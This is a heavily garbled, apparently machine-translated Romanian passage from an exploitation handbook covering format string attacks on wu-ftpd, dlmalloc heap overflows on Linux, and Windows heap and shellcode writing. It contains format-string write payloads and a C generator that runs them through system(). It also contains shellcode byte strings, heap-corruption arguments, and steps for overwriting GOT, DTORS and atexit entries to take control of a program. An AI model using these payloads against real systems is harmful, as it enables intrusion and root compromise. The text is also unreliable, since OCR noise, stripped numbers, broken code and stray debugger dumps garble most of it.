Poate sa a executa patru operațiuni înregistrări pe singur octet folosind mai tanar octet al nostru tejghea "personaje, retras pa cel moment" Natural, aceasta este va conduce la ştergerea Trei octeți dar Cartier Cu inregistrabil mărimea Un alt, Mai mult efectiv cale înregistrări bazat pe aplicarea mo/shfnka-yura lungime h Modificator mijloace ce ca urmare a întreg rebr i Control de mai sus execuţie ioianps va fi Terminat Cu argument tip mic de statura int sau nesemnat mic de statura int, sau la Următorul transformare P va fi folosit indicator pe argument МнІ int eu ііюім modul în care la instrucțiuni specificatorul %hn va fi înregistrate şaisprezece- pic ііs/ііііchiіpa Probabil, aceasta este va permite ne utilizare specificatorii lungime și gamă KB Sa incercam a executa Următorul comanda: /dowu gazdă locală $'\xb \xd \x \x % x% $n' Rezultat: program primit semnal SIGSEGV Segmentarea vina x c a în ?? O hexazecimal număr c a corespunde zecimal ; aceasta este exact io, ce noi așteptat Probabil, cheltuieli în plus explica, Unde a asumat inregistrabil sens' (OhsZBa) Să ne întoarcem Puțin înapoi și Fă-o comanda: /do wu gazdă locală abc O Daemon wu-ftpd răspunsuri şir index abc Transferat ne format linia adăugat în sfarsit linii index (lungime la jura este şase personaje) aceasta mijloace ce la utilizare specificatorul %P este înregistrată astfel de număr: () n + 'Asa de modul în care la implementare Următorul comenzi noi scrie pe abordare x d b sens ( + + ), sau în hexazecimal formă — OhsZba: /dowu gazdă locală $'\xb \xd \x \x ^ x^ $n Acum sa incercam scrie valoare x dar abordare printf: /dowu gazdă locală $'\xb \xd \x \x \xb \xd \x \x H x% $n% $n' Rezultat: program primit semnal SIGSEGV Segmentarea vina x în ?? () ( 'Prin urmare, s-a întâmplat tranziție pe abordare x In orice caz, noi Puțin înșelat și înregistrate unu sens ( x ) de două ori: pe abordare, definit parametru , și pe abordare parametru , pentru ce a fost indicat Mai mult unu pozițional parametru % $p Тс/ні o sa ai nevoie scrie serie octeți linia devine mai dificil Următorul auxiliar program se va simplifica sarcină //include //include ini safe strcat( char *dest char *src, nesemnat destjen ) eu dacă( ( dest — NUL ) || ( src — NUL ) ) întoarcere dacă ( sl rlrrit src ) + strlenl dest ) + >■= dosi Ion ) Capitol patru Defecte format linii întoarcere ; strcat( dest, src ): întoarcere , } int gres( char *msg ) { printf(' s\n", mesaj): întoarcere int principal( int argc, char *argv[] ) { // Schimbare următoarele linia, la redirecţiona proces // wu-ftpd alte date char *string to upload = "tagoo a avut A puțin iamb": nesemnat int adresă = x d b : // Părtinire parametru, "conținând" start linii nesemnat int param num = : char piele de bivol[ ] = int buff size = , char tmp[ ] = "": int eu, j, num pâna fara = , num to print, num so far mod, nesemnat mic de statura s, char *psz: int num addresses, a[ ] // Primul calculati număr adrese pe formulă // num octeți / + num octeți mod num addresses = (strlen( șir de încărcare ) / ) + strlen( string to upload) % : pentru( i = , i s ) num to print = x - (num so far mod - s); // Dacă num so far mod și s sunt egale, "ieșire" s num pâna fara += num to print // Retrage diferență în simboluri f( num to print > ) { sprintf( tmp, „®dx”, num to print ): if(!safe strcat( piele de bivol tmp, buff size )) întoarcere errCBuffer de asemenea mic ") // Redirecționare "mic de statura" valorile sprintf( tmp, „TOd$hn”, param num ): f( !safe strcat( piele de bivol, tmp, buff size )) întoarcere errCBuffer de asemenea mic "), psz += , param num++ printf( 'ls\n” piele de bivol ), sprintf( tmp, " /dowu gazdă locală $'£s' l\n", piele de bivol ), sistem( tmp ) întoarcere , eu Iroiramma servește Codul dowu, scris anterior, și scrie dat iroq (tagu a avut A Puțin iamb) pe abordare interior Mese A primit "tagoo a avut A puțin I ініб\()? С\ \ РV¥\ (etc) Capitol patru Defecte format linii Asa de, noi Poate sa scrie arbitrar secvenţă octeți practic pe oricine abordare memorie Acum poate sa trece peste la exploatare vulnerabilități Dacă compila redus anterior încorporat Codul Ieșire, A apoi depanare a lui în gdb, noi primim ca urmare a reprezentare asamblator comenzi în formă octeți: \x \xc \x \xc \x \xd \xb \x \x \xdb\xb \x \xcd\x Asa de modul în care noi primim şir constant, intrare care va fi efectuate program gen upload string c: char *string to upload = „\xb \xd \x \x \x \xc \c \xc \x \xd \xb \x \x \xdb\xb \x \xcd\x ” // ieșire( x ); Aici disponibil mic subtilitate, care cheltuieli explica mai ales Iniţială patru octeți linii a inlocui adresa printf în A PRIMIT și oferi transfer management pe dat ne abordare la apel printf() după apel vsnprintf(), crearea vulnerabilitate LA a lui exemplu noi pur şi simplu scrie A mea implementate Codul în a primit, început Cu adrese printf Desigur, aceasta este extrem barbar decizie, dar aceasta Cu minim treburi permite demonstra general metodologie Sesiune gdb pentru lansa gen upload Cu nou şir arata Asa de: [rădăcină@vulcan] format string]# ps -aux | grep grp ftp puncte/ S * ftpd gazdă locală [rădăcină@vulcan] format string]# gdb (gdb) atașați Atașarea la proces x a în ?? () (gdb) continua Conti nullng program ieșit cu cod (gdb) Asa de Cum noi mergem a executa A mea Codul în wu-ftpd, cheltuieli uite, Cum a acţionat alte atacând la exploatare dat defect unu din cel mai popular exemple exploatare defect a fost program wuftpd c Noi deja noi stim Cum forta wu-ftpd a executa Codul pe al nostru alegere, asa de acum pentru ne interes este în primul întoarce implementate Codul LA general Caracteristici el făcut ca urmare a: Apel setreuid()=O pentru primind privilegii root Apel dup () pentru copierea standard manipulatori (manere) la al nostru copil proces ar putea utilizare acea la fel priză Cauze defecte format linii „Eu Rescriere salvat adrese întoarcere Pentru acest necesar defini Locație salvat adrese întoarcere (stare brută forta, metodă mostre și greșeli sau mijloace citire/analiza date) • > eu Intrarea lui un alt indicator pe funcţie, specific pentru specific- th aplicatii De obicei acest cale s-a întâmplat suficient complicat deoarece ce în cel mai programe indicatoare pe funcții nu e disponibil In orice caz, dacă obiect atacuri este Apendice C++, Poate, pentru tine a reusi găsi niste într-o zi util indicator Rescriere indicator pe manipulator excepții Cu ulterior iniţiere excepții Probabilitate succes foarte Grozav, A adrese de obicei uşor sunt selectate - > eu reînregistrează element Mese A primit LA în special acest cale a fost aplicat pentru exploatare vulnerabilități wu-ftpd •» scrie manipulator atexit Posibilitate aplicatii depinde din specificul obiect atacuri •» eu reînregistrează elemente Mese DTORS ■" unsprezece reformare defect format linii în revărsare grămadă sau grămezi pe Verifica substituiri final caracter nul diferit de zero date Cale dificil, dar rezultate uneori Sunt foarte curios > Înlocuire oficial date aplicatii (sa spunem stocate valorile PP) inip GUID) alții date pe ta discreție » eu Іzmeііepis linii Cu text comenzi eu >|» M • » scrie implementate Codul dar selectat tu abordare memorie, folosind ( munți speciali %P aceasta a fost făcut în exemplu wu-ftpd Capitol patru Defecte format linii De exemplu, dacă implementate Codul este pe abordare esp+ x , apoi în masa A PRIMIT sunt înregistrate comenzi adăuga x USD, %esp jmp esp Acest mic fragment efectueaza tranziție la principal cod, asa de la înlocuire indicator pe funcţie (înregistrări A PRIMIT sau alte) Control va fi transferat al nostru implementate cod Similar recepţie lucru și Cu alții registre, care după prelucrare format linii conține adresa implementate cod sau închide la -l adrese Mai mult A merge, nu Asa de deja greu scrie mic fragment implementate cod, care va fi a determina Locație principal tampon Cu implementate cod și transmite către el Control Pe adiţional informație a lua legatura la excelent articol Hera și rica (Gera & Riq) în revistă Phrack pe abordare www phrack org/show php?p= &a= Rezultate LA acest capitol prezentat niste idei pe utilizare defecte format linii Cu toate că pa practică defecte format linii întâlni Toata lumea mai rar ei asezat în bază mulți metode atacuri, și asa de merita Atenţie CAPITOL cinci Revărsare grămezi ; Salut i lavă dedicat revărsare grămezi pe platformă linux la utilizare funcții malloc(), autor iniţială versiuni care a fost Doug Lee (Doug eu se); de aici titlu dlmalloc Cu exceptia A merge, depus concepte prigo-/ініея ii pentru alții implementari funcții maLLoc() Scris implementate cod /i nici revărsare grămezi poate Fii considerat Cum a lui drăguț "tranziție pe nou Etapa", după pe cine tu învăța gândi pe in afara trivial-io interceptare valorile EIR, salvat în grămadă Dlmalloc — Total numai unu din mulți biblioteci, păstrarea important metadate împreună Cu personalizat / nici unul Adânc înţelegere defecte funcții malloc va ajuta pentru tine deschis nou* moduri exploatare vulnerabilitati, nu legate de nici la unu din tradiţional categorii x la x date ALLOC SARCINĂ DATE HAS CONTENTS x -> x la x eh frame ALLOC SARCINĂ DATE HAS CONTENTS x -> x c la x dynamlc ALLOC SARCINĂ DATE HAS CONTENTS x c-> x la x c ctori ALLOC SARCINĂ DATE HAS CONTENTS x -> x c la x : dtori ALLOC SARCINĂ DATE HAS CONTENTS x c-> x la x c jcr ALLOC SARCINĂ DATE HAS CONTENTS x -> x la x a primit ALLOC SARCINĂ DATE HAS CONTENTS x -> x la x bss ALLOC niste linii din rezultate urme: brk(O) = x a brk( x a a ) = x a a brk( x b ) = x b ȘI Aici concluzie programe Cu adrese Două tampoane alocat funcţie malloc(): buf= x b buf = x b In cele din urma, din nou ieșire pepene comenzi întreținere info secțiuni Cu informație despre segmente folosit în timp împlinire programe A plati Atenţie pe segment grămadă (ultimul) și segmente, conținând indicatoare (Încărcare ): x -> x la x loadl ALLOC SARCINĂ NUMAI CITIT COD HAS CONTENTS x -> x a la x sarcina ALLOC SARCINĂ HAS CONTENTS xbfffe -> xc la OxOOOOfOOO• loadll ALLOC SARCINĂ COD ARE-CONTINUT (gdb) print/x $esp $ = Oxbffff Functionare grămezi Apel funcţie brk() sau mmap() fiecare o singura data, când program necesar memorie, a fost ar prea mult încet și incomod În loc de acest în implementare libc aprinde funcții maLloc(),realloc() și liber(), care evocare programator pentru alocare memorie sau după completare muncă Cu ikch'i Revărsare grămezi Funcţie malloc() pauze mare bloc memorie, dedicat funcţie brk(), nici fragmente (bucăți) și se intoarce utilizator fragment la admitere i shrosa (de exemplu, dacă utilizator solicitat bloc în octet) Dacă nevoie, malloc() beretă fragment Mai mult mărimea și pauze a lui pe Două mai mica fragment De asemenea, la apel liber() funcţie trebuie sa rezolva, este interzis /ii lua eliberată fragment și uni a lui Cu adiacent Cu ambii horop liber fragmente în unu mare fragment Uniune reduce fragmentare (situatie, când o multime de mic folosit fragmente supleanți Cu mulți mic liber fragmente) și îi place treci bine fără prea mult frecvent apeluri brk() Orice implementare malLoc() magazine mare număr metadate, descriind Locație fragmente, lor dimensiuni și t d Serviciu informație stocate în structurat formă — în dlmalloc ea organizat în cuiburi (găleți), A în mulți alții implementari malloc folosit echilibrat copac (dacă tu nu tu stii Cum lucru structura echilibrat derena, nu întrista — la nevoie tu mereu găsi acest informație \despre și eu mai repede Total, ea pentru tine ne va fi nevoie) informație stocate în Două locuri: în global variabile, folosit cel mai implementare malloc(), și în blocuri memorie, situat inainte de și/sau după alocat blocuri memorie Anterior noi deja vorbit despre grămadă, Unde indicator cadru ii indicator comenzi stocate direct după tampon, care poate ('s gі> aglomerat Ceva asemănătoare merge mai departe în morman: important informație despre co-( iunie memorie stocate direct pe tampon, dedicat utilizator Revărsare grămezi Termen revărsare grămezi (hcap revărsare) aplicat pentru descrieri mulți vulnerabilități La fel de de obicei, s-a întâmplat sănătos a pune eu insumi pe loc program- Samba inemcpy(arrayCuser supplied int] tampon furnizat de utilizator user supplied int ) •) Microsoft IIS: buf=malloc(user supplied nt+l), memcpy(buf,user buf user supplied i nt), > IIS bufurnalloc(strlen(user buf+ )), strcpy(buf user buf) » Solaris Autentificare: buMchar **)malloc(BUf SIZE) wh i le (user buf[ ] M) { huli > —>pl eu f w ( buf= x ++ ieșit (stare ) +++ La fel de vedea eșec nu a avut loc Caz în volum, ce personalizat linia nu sters structura date, necesar pentru apel liber(), cu toate că hopa iamenu tu ii/ia pe limite alocat despre tampon Revărsare grămezi Igneri" considera un alt vulnerabil program: /Al)asicheap Cu*/ ini principal (int argc char** argv) { char *buf, ('har *buf : buf=(char*)malloc( ) buf =(car*)malloc( ) printf(''buf=^p buf =^p\n",buf,buf ) *>lrcpy(buf argv[l]): iree(buf ); ( Times/Altele include în volum, ce vulnerabil program evidențiază un alt tampon după primul tampon, care poate a fi aglomerat Asa de modul în care în memorie /ірѵі pe prieten urma Două tampon, și al doilea tampon prada la revărsare primul Pe primul vedere aceasta este arata niste ciudat, dar dacă a gandi cuier destul de logic Structura metadate tampon deteriorat la revărsare, și la a lui eliberare subsistem Colectie eliberată memorie malloc remiză pe invalid adrese: eu (lave@localhost SAI]$ Itrace /de bază-ieftin 'perl -e 'prinţ "ȘI" X '' Iibc start main( x c , xbfffe x s, x s iii i ani( ) = x b piai os( ) = x b prmtfCbuf^p buf =^p\n", buf= x b buf = x b ) = • ingcpy( x b "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ) = x b Igee( x b ) = SIGSEGV (Segmentare vina) - iki LED de SEGSEGV +++ SFAT - Dacă tu nu obține de urgență haldă memorie, nu a uita aprinde în comanda şir cheie ulimit -Cu nelimitat NOTĂ - - Când tu maestru subiect revărsare tampon, vulnerabil program poate sa va fi eu > examineaza Cum special interfata API pentru apel malloc(), fgee() și rea oc() Pentru de succes exploatare vulnerabilități necesar va fi a guverna în ordine alocare memorie, dimensiuni tampoane și adus în în lor date II revizuit exemplu marimea debordant tampon și general structura n nume i P deja cunoscut Tem nu Mai puțin, în mulți cazuri acest informație purta •і і/іыіо nu e disponibil Apendice poate răspândire Cu închis Exod lor texte, și chiar la disponibil iniţială textele structura memorie lu ,kg se dovedesc a fi extrem complex LA astfel de cazuri mai simplu Verifica, Cum nroi ramma reactioneaza pe variat lungime atacatori linii, în loc de A merge, la și cel mai mic Detalii a analiza logică muncă programe Tem nu Mai puțin, într-adevăr de încredere exploatare vulnerabilități de multe ori cerere' ana ii i i iniţială textele După ce am rezolvat Cu simplu întâmplător noi Să mergem mai departe la Mai mult " fals liiagnos i nke și popgikam exploatare vulnerabil ei Capitol cinci Revărsare grămezi depus metodă spectacole Cum noi noi vom manipula provocări malloc(), la a provoca revărsare Pic utilizare anterior fragment va fi scăzut, A apoi lungime "anterior fragment" noi atribui negativ sens aceasta va permite ne defini, Unde situat al nostru fragment interior tampon Implementări malloc, inclusiv implementare dlmalloc pentru linux, magazin adiţional informație în liber fragmente Asa de Cum liber fragment nu conţine personalizat date, el poate aplica pentru depozitare informație despre alții fragmente Primul patru octeți spaţiu, care de obicei ocupat personalizat date, în liber fragment conține Drept indicator (apoi mânca indicator pe Următorul fragment), A următoarele patru octeți — înapoi indicator (apoi mânca indicator pe anterior fragment) Aceste indicatoare noi noi vom utilizare pentru substituiri arbitrar date Comanda execută program Cu revărsare tampon buf și Schimbare antet fragment buf ; în antet este înregistrată marimea OxffffffffO și marimea anterior fragment Oxffffffff NOTĂ - Nu a uita despre bine ca urmare a octeți în arhitectură IA LA niste versiuni palarie rosie linux perl la retragere niste simboluri convertit în lor Echivalente Unicode La acest nu a avut loc, noi noi vom utilizare Piton Valori argumente la fel poate sa cere în gdb după împlinire comenzi lansa: (gdb) alerga 'piton -Cu prinţ „A”* +”\xff\xff\xff\xff” + ”\xf \xff\xff\xff" ' NOTĂ - - Comanda (gdb) x/xw buf- permite a primi lungime buf Chiar dacă program compilate fără includere simbolic informație, start tampon de multe ori a reusi uşor defini vizionare conţinut memorie (Start serie ȘI) Lungime tampon determinat anterior intr-un cuvant: (gdb) x/xw buf- x ac x (gdb) printf ld\rT , x LA realitate aceasta este număr , apoi mânca un plus octet pentru depozitare informativ antet fragment Mai tanar pic este steag anterior fragment Dacă el instalat (Cum în dat exemplu), mijloace, antet fragment nu conţine mărimea anterior fragment Dacă mai tanar pic egală zero, tu poti găsi anterior fragment, folosind în calitate a lui mărimea sens buf- Al doilea pic la fel este steag, care indica, numit dacă pentru alocare fragment funcţie mmap() Instalare punct întrerupe în Jnt free() pe echipă, tehnica de calcul c/ieduio- Mai mult fraimepі, și tu adiacent* i rassnrov > muncă liber() (tot ceea ce n iiiin și vi la Revărsare grămezi mandu, încerca cere marimea fragment egal x și uite, i /IG întâmpla eșec int free()): ()x fdd - lea (%edi desi, ) Lesh lipii realizarea puncte întrerupe program afișează ca urmare a: bp(= x b buf = x b Nogle acest performanţă întrerupt: ( mov xffffff (^edx) ,°Zeax x ffb sub ^eax ^esi LA primul echipă (mov x (%esi),%edx) parametru %edx conţine x b , adresa eliberată tampon buf opt octeți anterior stocate marimea anterior tampon, care acum conservat în %ex Desigur, noi înlocuit dar sens, care mai devreme a fost egală , și acum aceasta egală Oxffffffff (- ) Dar al doilea echipă (adăuga %eax,%edi) în parametru %esi stocate adresa antet igkuitsego fragment Marimea anterior tampon scazut din adrese actual fragment pentru primind adrese antet anterior fragment Desigur, după substituiri mărimea sens - situatie va merge pe un alt cale II Următorul echipe (macro deconectați()) merge mai departe interceptare controale: x ffd - mov x (£esi) edx x adăuga ^eax ^edi x * mov Oxc(^esi)Deah; DECONECTARE x mov %eax,Oxc(^edx) DECONECTARE x : mov %edx, x (^eax), DECONECTARE Sens %esi schimbat asa de modul în care la aceasta menționate pe cunoscut adresa personalizat tampon LA Următorul echipe noi Poate sa a guverna trepte %edx și %ex, aplicat în calitate argumente pentru înregistrări și memorie Caz în volum, ce mulțumită al nostru manipulare rubrica fragment buf funcţie liber() la apel gandeste ce regiune memorie în buf (palid- ^chitsayasm sub al nostru Control) este rubrica fragment nefolosit bloc memorie - mov %eax Oxc(^edx) x - mov %edx, x (%eax) Acum sens %eax va fi înregistrate în %edx+ , A %edx — în %eax+ urmă pe subiecte la adrese %eax și %edx au fost valabil pentru înregistrări (sau în program ar trebui să a fi numit manipulator semnal SIGSEGV) (gdb) prinţ "wx" & exit funcs- USD = ( *) x fc Desigur, după definiții fictiv fragment la fel necesar defini un alt antet fictiv "anterior" fragment, sau la apel int-free întâmpla eșec după ce a întrebat marimea buf egal OxffffffffO (-şaisprezece), noi plasat fictiv fragment în regiune tampon, situat sub al nostru Control (orez ) [ȘI Dedicat memorie C Liber memorie Q Nefolosit memorie Exemplu nefragmentat grămezi Mare parte goluri în acest exemplu a fost cu succes comasate calitate implementare malloc Exemplu fragmentat grămezi După multiplu operațiuni alocare memorie rămâne liber blocuri, care nu a reusi uşor lipitură sau utilizare Orez Revărsare grămezi Revărsare grămezi Tichigry» Toata lumea împreună: „L”H l() )+"\xff"* +,,A"* +"\xf \xff\xff\xff"+,,\xfO\xff\xff\xff,,+"\xff\xff\ X fff \- "ARiintel order(wordl)+intel order(word ) (Idich i cuvânt+ suprascris sens cuvânt, A cuvânt + — sens wordl (funcţie intel prder() se transformă orice întreg număr în şir Cu verso în-(ishikom ca urmare a octeți) eu Іпіиiiiieiu noi pur şi simplu alege cuvânt, destinat pentru suprascrierea date II -l caz de bază ieftină cauze Ieșire() direct după eliberare ІНІІ/ ('idl)) print/x exit funcs ■W - x aa M i i Poate sa utilizare aceasta este sens Cum cuvânt, A adresa în grămadă — Cum cuvântul eu |ініі(ірное revărsare Cu aceste argumente Oportunitati la Următorul rezultat-• SALUT V eu ochgoip primit semnal SIGSEGV Segmentarea vina (bolnav eu f ffof în ?? () La și la nndpte, noi cu succes predat Control în grămadă Dacă ar aceasta este a fost local-ipg revărsare grămezi, A grămadă a fost executabil, sarcină poate sa a fost ar ia în considerare unsprezece rezolvate Obiecte substituiri II general caz posibil Trei major strategii: eu Înlocuire indicatoare pe funcții ? Înlocuire cod, situat în segment pentru pe cine permis record eu La înregistrări Două cuvinte — scrie fragment cod, A apoi a inlocui instrucțiuni pa funcţie, la el menționate pa înregistrate Codul La fel poate sa a inlocui gh sens logic variabil (de exemplu, este conectat) pentru schimbări mutare împlinire programe Intrări Mese A PRIMIT Ій utilizare comanda objdump -R pentru citind indicatoare pe funcții A PRIMIT din Ііг,ір |d,iv(' www FORFUN]$ objdump -R /heap /el l UNICODE "t'-servi" UNICODE ''c'', ILR K ONG-urile ECX, IUI ntol F D UNICODE "x-^xUNCx" UNICODE Dl) ntdll F C UNICODE ”xx xCON'', UD ntdl , F F UNICODE „xx x”, APĂSAŢI ntdl F E APĂSAŢI ntdl F EC USCII ''RT ILlockHeap'*, HSC II *'Rt un lockHeap”, APĂSAŢI ntd F UNICODE '' dll'', APĂSAŢI ntdl I F B C UNICODE „Sl-”, APĂSAŢI ntdl , F C UNICODE „xREGISTER” ijmkM £ Sf' UNICODE ” da" UNICODE "x^xUNCx" UNICODE UNICODE -CON' OSC „RtlLockHeap” OSCII „RtlUnlockHeap” UNICODE UNICODE "S- -' UNICODE „xREGISTRYxUSERx ff UllilOO ff U UI (f niuuiw i'tiououinl O bE j D , RPCRT ' cinci ! DB J DU PI - cinci i E BDB- UTILIZATOR cinci B E DjKERNEL cinci C ! „GDI B ir MSUCRT ' CsxldlNNTxsysten; ' " CsxWINNTxsysten; C: xidlNNTxsysten; § C: xWINNTxsy Sf ro; Cs xldlNNTxsystenc C: xWINNTxSysten; , , C: xldlNNTxsysten- , j S YY I Owhe" F & І Feb F F F F O F F FC FCB FCF ' FD FF ȘI EU D text Import >• > D text D C text D C text D text D text D text D text D C text text D C text D F text -”L R text IjM GDI GDI GOI GDI ntdll ntdl l Scăpa eu Scăpa eu Scăpa Scăpa Scăpa Scăpa Scăpa Scăpa " - MakeSelfRelativeSD L „li nennove MesBufferHandIeReset FB text Export Export Export Export Export Export Export Export Export ENROGL Export Export Export F EECB text FB E text F F text FB D text FB text FB C text F B B text F text F D Nr " snpr intf snwpr intf splitpath sprintf sqrt sscanf strcat strchr •strcnp strictnp Jdș ra [І&OІІURYa - ashі vhe Orez OllyDbg afișează toate necesar informație despre încărcat în memorie biblioteci DLL , trebuie sa adăuga sens RVA la de bază abordare" De exemplu, funcții malloc() este în bibliotecă msvcrt dll antet msvcrt dll conţine iii export — masa functii, furnizate acest bibliotecă eu fata zero export conţine şir Cu Nume malloc și sens RVA (de exemplu, ) După descărcări biblioteci DLL în memorie (sa spunem pe abordare OmNOOOOOOOOO) funcţie malloc poate sa va fi găsi pe abordare x De obicei P Windows NT fișiere EXE sunt în curs de încărcare pe abordare x Adresa poate Schimbare Aici în dependențe din lingvistic pachete sau parametrii compilator n purtat la fel inainte de niste grad el este standard Simbolic nume pentru fișiere PE, distribuite Microsoft, de obicei poz i sunt în plus Tu poti Descarca pachete simbolic nume pentru fiecare sala de operatie sisteme Microsoft Cu site-ul web MSDN sau sub-h Schimbare la Server simbol Server din windbg Depanator OllyDbg în prezentul timp nu suporturi la distanta conexiune la simbol Server morman La Se încarcă biblioteci DLL numit funcţie initializare Acest funcţie de multe ori creează proprii buchet provocare HeapCreate() și salvează decret pa a ei în global variabil, la ea folosit la viitor operațiuni alocare memorie în loc de tăcut grămezi LA cel mai baveta- »knek DLL prezent secțiune date, destinat pentru depozitare global variabile, și în acest zone de multe ori dai peste util indicatoare pa funcții sau structurilor date Asa de Cum în memorie simultan este mulți încărcat biblioteci dll, grămezi de asemenea mulți, și aceasta este circumstanţă complică atacuri, regizat pe deteriora oficial date grămezi LA linux de obicei deteriorat Total unu morman, dar în Windows încălcări Mai întâmpla n> simultan în mai multe grămezi, ce semnificativ complică analiză si-iuatsii Când utilizator cauze malloc() în win , el în realitate in absenta valabil funcţie, exportate bibliotecă msvcrt dll, care apoi pufături HeapAllocate() pentru creare personal grămezi acest biblioteci Probleme de obicei ÎNCEPE apoi, când tu efectuat revărsare grămezi și încercând apel orice funcții Win API din a lui implementate cod Singur funcții muncă amenda, alte cauză greșeli încălcări acces în RtlHeapFree() și RtlHeapAllocate() și complet proces inainte de A merge, Cum py dar / invata posibilitate lua a lui sub A mea Control LA în special funcţie W el() și a ei analogi nu muncă Cu deteriorat morman V toata lumea proces disponibil tăcut morman A ei poate sa găsi Cu Ajutor funcții GetDefaultHeap(), cu toate că a ei deteriora improbabil Important proprietate învăța Windows este în volum, ce ea poate crește pe limite segmente II a i număr, dacă trimite suficient date Server iis, tu înștiințare ce ser-nsr evidențiază segmente în senior adrese memorie și utilizări lor pentru depozitare janііyh Similar manipulare Cu memorie Mai a fi util, dacă trusa • nmvo/sw, care este înregistrată adresa întoarcere, limitat și tu vreau să părăsi puf din un alt proces sau din funcții LogonUser() Funcţie LogonUserQ dar/eu predau Nume utilizator și parola și se intoarce nou marker în caz de succes completări Tu poti a te alatura orice marker la actual curgere funcţie SretThreadToken(token to attach) sau Deconectat a lui funcţie RcvertToSelf(), după ce curgere se intoarce la primar marker IІніepoca de dragul Descarca program proces explorator (www sysinternals com), n tu vedea ceva curios: primar marker afișat în format \('i Nume, A pe fund panouri Mai ieșire unu sau niste markere •nіya diferit niveluri acces (orez ) ProcBss explorator - Sisteme interne: www sysinterhals com ' ' G De vedere proces Hamlfe Opțiuni Căutare Ajutor Pioms !HD { CW | Oesaipt | eu ZD'myi" eu L: "" Sistem Inactiv proces ~~ Sistem NT AUTORITATEXSISTEM ^SMSSEXE Windows NT AUTORITATEXSISTEM unsprezece ** CSRSS EXE client Ser NT AUTORITATEXSISTEM ȘI WINLOGON EXE Windows NT AUTORITATEXSISTEM ?SEFiVICES EXE unsprezece Servicii NT AUTORITATEXSISTEM nouă !****, svehost executabil Genenc NT AUTORITATEXSISTEM '***, hpgs wnf executabil hpgs wnt EX^ MPLE XAdmimstiatoi DLLHOST EXE COM Soare NT AUTORITATEXSISTEM COM Otf SXAMPIhWAM^# § **" bobinev executabil Spooler S NT AUTORITATEXSISTEM (• £ msdtc executabil DOMNIȘOARĂ DTC NT AUTORITATEXSISTEM ?*** swagent exe Data Dire NT AUTORITATEXSISTEM iceiiii x nu eu G i a ei SI eu E-structură, acordat sala de operatie sistem Ea seară in absenta oubrazhepie fereastră, în care utilizator raportat despre asigurări aplica Capitol Sălbatic pace Windows Alte posibilitate este în înlocuire indicator pe funcţie manipulator în grămadă sau în înlocuire tăcut manipulator excepții LA Windows XP apare Mai mult unu opțiune: vector tratament excepții LA entitate, aceasta este Mai mult unu conectat listă, conţinut pe cine primul verificat cod prelucrare excepții din ntdll dll Asa de modul în care apare global variabil, recurs la care merge mai departe la toata lumea excepție — ideal candidat pentru suprascrie Depanatoare pentru Windows LA entitate, în calitate depanator pentru Windows disponibil numai Trei instrument: windbg din unelte Microsoft, depanator nuclee Softce și OllyDbg La dorință poate sa la fel utilizare Vizual studio Din toate enumerate depanatoare SoftICE — cel mai vechi și cel mai puternic LA -l activat a sustine limbajul macro și posibilitate depanare spaţiu miezuri La neajunsuri SoftICE poate sa atribuite incredibil dificultăți Cu instalare și excesiv tradiţie interfata SoftICE destinat în primul întoarce pentru depanare nou şoferii dispozitive LA curgere lung timp la hackeri pur şi simplu nu a fost un alt alegere, asa de pe muncă Cu SoftICE scris niste bun manuale În timp depanare nuclee depanator SoftICE include posibilitate înregistrări pentru toate pagini; tine minte despre acest, dacă dezvoltat tu revărsare nuclee lucru numai la a sustine SoftICE Depanator windbg de asemenea prevede depanare nuclee (cu toate că pentru acest necesar consistent cablu și un alt un calculator), dar el la fel extrem convenabil pentru depanare revărsare în personalizat vizate spaţiu LA windbg implementate primitiv limba, dar personalizat interfata pur şi simplu teribil — el absolut ns adaptat pentru rapid și exacte muncă Tem nu Mai puțin, deoarece acest depanator a oferit în Microsoft, el Are rând confortabil funcții ca automat contestatii la Server simbolic nume Și Toata lumea la fel cel mai bun din vreodată creată depanatoare este OllyDbg El are uimitoare oportunități ca urmărire, instalatii puncte întrerupe în memorie (de exemplu, la punct întrerupe a lucrat la toata lumea circulaţie la date din global spaţiu date MSVCRT DLL), "intelectual" şanţ date, asamblator — apoi mânca practic toata lumea ce poate necesar Dacă OllyDbg nu suporturi niste necesar oportunități, scrie auto RU, și destul de Poate, relevante funcţie va aparea în Următorul versiuni A face exerciţii fizice în conexiune la proceselor din OllyDbg, aplicarea fonduri SPIKE și analiză în curs de dezvoltare excepții Asa de tu repede maestru excelent grafic interfata OllyDbg Defecte Win Win conţine destul de putine defecte, mulți din care nu documentat Depanatoare pentru Windows iuA(), Se încarcă bibliotecă DLL în memorie, nu va fi muncă, dacă în sens RATH prezent punct, A pe calculator nu a fost instalat Codul remedieri acest specific erori Funcții winsock refuza muncă, dacă i ec nu aliniat pe frontieră cuvinte Mulți funcții rău documentat P MSDN (A apoi și deloc nu documentat) Moralitate: dacă implementate Codul nu lucru, nu exclus, ce aceasta este explicat /efect Windows Poate, pentru tine Trebuie să pur şi simplu căutare ocolire decizie Scris implementate cod pentru Windows eu I scriptura de încredere implementate cod pentru Windows în curgere lung timp A fost considerat faptă aproape imposibil Caz în volum, ce, în diferență din unix, și al nostru eliminarea Nu sistemică funcții Cu celebru interfata API ІІmesgo acest proces încărcături indicatoare pe extern funcții ca (irateProcess() sau ReadFileQ pe variat adrese memorie Dar atacator necunoscut Unde exact în memorie ei voi fi Din timp versiuni implementate cod au fost calculat pe beton Locație sau încercat da unu din mai multe Opțiuni Dar aceasta este însemna ce la în curs de dezvoltare nrіramm, exploatând vulnerabilități a trebuit sa crea niste diferit versiuni pentru diferit actualizări Serviciu Rusk sau executabil fișiere Scris de încredere și repetat folosit implementate cod bazat pa volum fapt, ce Windows magazine indicator pe bloc mediu inconjurator proces pe și local abordare: FS:[Ox O] Plus la -l valorile Ohhe va da indicator pe listă module în bine descărcări Tu obține conectat listă, enumerare elemente pe cine poate sa găsi bibliotecă kernel dll LA a ei poate sa găsi funcții LoadLibraryA() și GetProcAddress(), permițând Descarca orice necesar biblioteci DLL și găsi adrese orice alții funcții Poate, pentru acest pentru tine Trebuie să întoarcere la documentație PE-COFF din Miriosoft și recitit a ei ba th G cu siguranță, exista și un alt cale Diferit chinez hackeri a scris implementate Codul, care caut în zdrobi nucleu prin destinaţie manipulator n |otherі іy aditiv codificator PÂNZĂ (analogic codificare / de i pa Toata lumea cazuri viaţă" — Poate, va fi mai simplu convertit destinat pentru atacuri şir în arbitrar binar secvenţă pe nu-i acum etape, punerea în aplicare niste scheme decriptare Geek sau in caz contrar, temă criptare/decriptare în acest capitol în general ns curse Mііirnvaetsya Presupus, ce tu deja tu stii Cum a contribui arbitrar ciclu date în spaţiu proces și transfer către lor 